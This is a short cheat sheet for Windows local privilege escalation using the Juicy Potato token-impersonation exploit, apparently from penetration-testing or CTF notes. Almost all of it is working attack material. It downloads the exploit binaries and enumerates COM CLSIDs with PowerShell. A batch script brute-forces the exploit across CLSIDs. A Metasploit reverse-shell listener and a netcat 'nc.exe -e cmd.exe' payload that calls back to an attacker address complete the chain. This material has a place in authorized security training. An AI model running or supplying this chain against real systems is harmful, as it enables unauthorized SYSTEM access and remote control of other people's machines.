Windows privilege escalation technique.
- Impersonating Privileges with Juicy Potato
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
- Potatoes – Windows Privilege Escalation
Check if vulnerable
If winPEAS says the the account has “SeImpersonatePrivilege” or “SeAssignPrimaryTokenPrivilege”, try Juicy Potato.
whoami /privCheck the architecture to know which version of JuicyPotato to use.
systeminfo | findstr "System Type"Exploit
Download the exploit
wget -O JuicyPotato.exe https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exeX86 version
wget -O JuicyPotato.exe https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exeScript to enumerate CLSIDs (CLSID.ps1)
New-PSDrive -Name HKCR -PSProvider Registry -Root HKEY_CLASSES_ROOT | Out-Null
$CLSID = Get-ItemProperty HKCR:\clsid\* | select-object AppID,@{N='CLSID'; E={$_.pschildname}} | where-object {$_.appid -ne $null}
foreach($a in $CLSID) {
Write-Host $a.CLSID
}Try the exploit on every CLSID identified (exploit_brute_clsid.bat)
@echo off
SETLOCAL ENABLEDELAYEDEXPANSION
FOR /F %%i IN (CLSID.list) DO (
echo %%i
JuicyPotato.exe -p c:\<somepath>\rev.bat -l 9001 -t * -c %%i
set RET=!ERRORLEVEL!
)Upload
Upload all the files + netcat
/usr/share/windows-resources/binaries/nc.exeStart a listener
msfconsole
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST tun0
set LPORT 9001
set ExitOnSession false
exploit -jGenerate a reverse shell payload
echo c:\<somepath>\nc.exe -e cmd.exe x.x.x.x 9001 > rev.batGenerate the list of CLSIDs
powershell -executionpolicy bypass -file CLSID.ps1 > CLSID.listExecute the exploit – when knowing CLSID
privesc.exe -p c:\<somepath>\rev.bat -l 9001 -t * -c {<CLSID>}Execute the exploit – when NOT knowing the CLSID
exploit_brute_clsid.batThe listener should receive a connection.